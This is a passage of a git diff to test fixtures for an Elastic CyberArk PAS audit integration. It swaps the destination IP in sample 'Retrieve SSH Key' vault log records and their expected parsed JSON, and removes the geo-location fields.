127.0.0.1\n \n \n \n (Action: Connect)testing(Connection to address: 34.123.103.115)\n \n \n testing\n Connect\n \n \n 34.123.103.115\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:08:48","IsoTimestamp":"2021-03-11T21:08:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: Connect)testing(Connection to address: 34.123.103.115)","PvwaDetails":{"RetrieveReason":{"General":{"UserReason":"testing","RetrieveAction":"Connect"},"ConnectionDetails":{"ConnectionAddress":"34.123.103.115"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T13:18:52Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:52\n 2021-03-15T13:18:52Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n (Action: Retrieve SSH key)\n \n \n Retrieve SSH key\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:52","IsoTimestamp":"2021-03-15T13:18:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: Retrieve SSH key)","PvwaDetails":{"RetrieveReason":{"General":{"RetrieveAction":"Retrieve SSH key"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:43:44Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:43:44\n 2021-03-11T17:43:44Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n (Action: Retrieve SSH key)for fun and profit\n \n \n for fun and profit\n Retrieve SSH key\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:43:44","IsoTimestamp":"2021-03-11T17:43:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: Retrieve SSH key)for fun and profit","PvwaDetails":{"RetrieveReason":{"General":{"UserReason":"for fun and profit","RetrieveAction":"Retrieve SSH key"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T21:08:48Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:08:48\n 2021-03-11T21:08:48Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n (Action: Connect)testing(Connection to address: 67.43.156.15)\n \n \n testing\n Connect\n \n \n 67.43.156.15\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:08:48","IsoTimestamp":"2021-03-11T21:08:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: Connect)testing(Connection to address: 67.43.156.15)","PvwaDetails":{"RetrieveReason":{"General":{"UserReason":"testing","RetrieveAction":"Connect"},"ConnectionDetails":{"ConnectionAddress":"67.43.156.15"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T13:18:52Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:52\n 2021-03-15T13:18:52Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n (Action: Retrieve SSH key)\n \n \n Retrieve SSH key\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:52","IsoTimestamp":"2021-03-15T13:18:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: Retrieve SSH key)","PvwaDetails":{"RetrieveReason":{"General":{"RetrieveAction":"Retrieve SSH key"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log-expected.json index a5514b806f2..3a02548c116 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-428-retrieve-ssh-key.log-expected.json @@ -7,20 +7,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -43,7 +34,7 @@ }, "@timestamp": "2021-03-11T17:43:44.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -55,7 +46,7 @@ ], "ip": [ "127.0.0.1", - "34.123.103.115", + "67.43.156.15", "10.0.1.20" ] }, @@ -65,7 +56,7 @@ "reason": "(Action: Retrieve SSH key)for fun and profit", "iso_timestamp": "2021-03-11T17:43:44Z", "gateway_station": "10.0.1.20", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:43:44\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:43:44Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e428\u003c/MessageID\u003e\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e(Action: Retrieve SSH key)for fun and profit\u003c/Reason\u003e\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\n \u003cGeneral\u003e\n \u003cUserReason\u003efor fun and profit\u003c/UserReason\u003e\n \u003cRetrieveAction\u003eRetrieve SSH key\u003c/RetrieveAction\u003e\n \u003c/General\u003e\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:43:44\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:43:44Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e428\u003c/MessageID\u003e\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e(Action: Retrieve SSH key)for fun and profit\u003c/Reason\u003e\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\n \u003cGeneral\u003e\n \u003cUserReason\u003efor fun and profit\u003c/UserReason\u003e\n \u003cRetrieveAction\u003eRetrieve SSH key\u003c/RetrieveAction\u003e\n \u003c/General\u003e\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Retrieve SSH Key", "issuer": "Administrator", "pvwa_details": { @@ -80,12 +71,12 @@ "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", "station": "127.0.0.1", "action": "Retrieve SSH Key", @@ -99,8 +90,8 @@ "event": { "severity": 2, "reason": "(Action: Retrieve SSH key)for fun and profit", - "ingested": "2021-06-09T10:24:35.337710600Z", - "original": "\u003c5\u003e1 2021-03-11T17:43:44Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:43:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:43:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e428\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Retrieve SSH key)for fun and profit\u003c/Reason\u003e\\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\\n \u003cGeneral\u003e\\n \u003cUserReason\u003efor fun and profit\u003c/UserReason\u003e\\n \u003cRetrieveAction\u003eRetrieve SSH key\u003c/RetrieveAction\u003e\\n \u003c/General\u003e\\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:43:44\",\"IsoTimestamp\":\"2021-03-11T17:43:44Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"428\",\"Desc\":\"Retrieve SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Retrieve SSH key)for fun and profit\",\"PvwaDetails\":{\"RetrieveReason\":{\"General\":{\"UserReason\":\"for fun and profit\",\"RetrieveAction\":\"Retrieve SSH key\"}}},\"ExtraDetails\":\"\",\"Message\":\"Retrieve SSH Key\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:04.741497400Z", + "original": "\u003c5\u003e1 2021-03-11T17:43:44Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:43:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:43:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e428\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Retrieve SSH key)for fun and profit\u003c/Reason\u003e\\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\\n \u003cGeneral\u003e\\n \u003cUserReason\u003efor fun and profit\u003c/UserReason\u003e\\n \u003cRetrieveAction\u003eRetrieve SSH key\u003c/RetrieveAction\u003e\\n \u003c/General\u003e\\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:43:44\",\"IsoTimestamp\":\"2021-03-11T17:43:44Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"428\",\"Desc\":\"Retrieve SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Retrieve SSH key)for fun and profit\",\"PvwaDetails\":{\"RetrieveReason\":{\"General\":{\"UserReason\":\"for fun and profit\",\"RetrieveAction\":\"Retrieve SSH key\"}}},\"ExtraDetails\":\"\",\"Message\":\"Retrieve SSH Key\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "428", "kind": "event", "action": "retrieve ssh key", @@ -124,20 +115,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -160,7 +142,7 @@ }, "@timestamp": "2021-03-11T21:08:48.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -172,17 +154,17 @@ ], "ip": [ "127.0.0.1", - "34.123.103.115", + "67.43.156.15", "10.0.1.20" ] }, "cyberarkpas": { "audit": { "severity": "Info", - "reason": "(Action: Connect)testing(Connection to address: 34.123.103.115)", + "reason": "(Action: Connect)testing(Connection to address: 67.43.156.15)", "iso_timestamp": "2021-03-11T21:08:48Z", "gateway_station": "10.0.1.20", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 13:08:48\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T21:08:48Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e428\u003c/MessageID\u003e\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e(Action: Connect)testing(Connection to address: 34.123.103.115)\u003c/Reason\u003e\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\n \u003cGeneral\u003e\n \u003cUserReason\u003etesting\u003c/UserReason\u003e\n \u003cRetrieveAction\u003eConnect\u003c/RetrieveAction\u003e\n \u003c/General\u003e\n \u003cConnectionDetails\u003e\n \u003cConnectionAddress\u003e34.123.103.115\u003c/ConnectionAddress\u003e\n \u003c/ConnectionDetails\u003e\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 13:08:48\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T21:08:48Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e428\u003c/MessageID\u003e\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e(Action: Connect)testing(Connection to address: 67.43.156.15)\u003c/Reason\u003e\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\n \u003cGeneral\u003e\n \u003cUserReason\u003etesting\u003c/UserReason\u003e\n \u003cRetrieveAction\u003eConnect\u003c/RetrieveAction\u003e\n \u003c/General\u003e\n \u003cConnectionDetails\u003e\n \u003cConnectionAddress\u003e67.43.156.15\u003c/ConnectionAddress\u003e\n \u003c/ConnectionDetails\u003e\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n 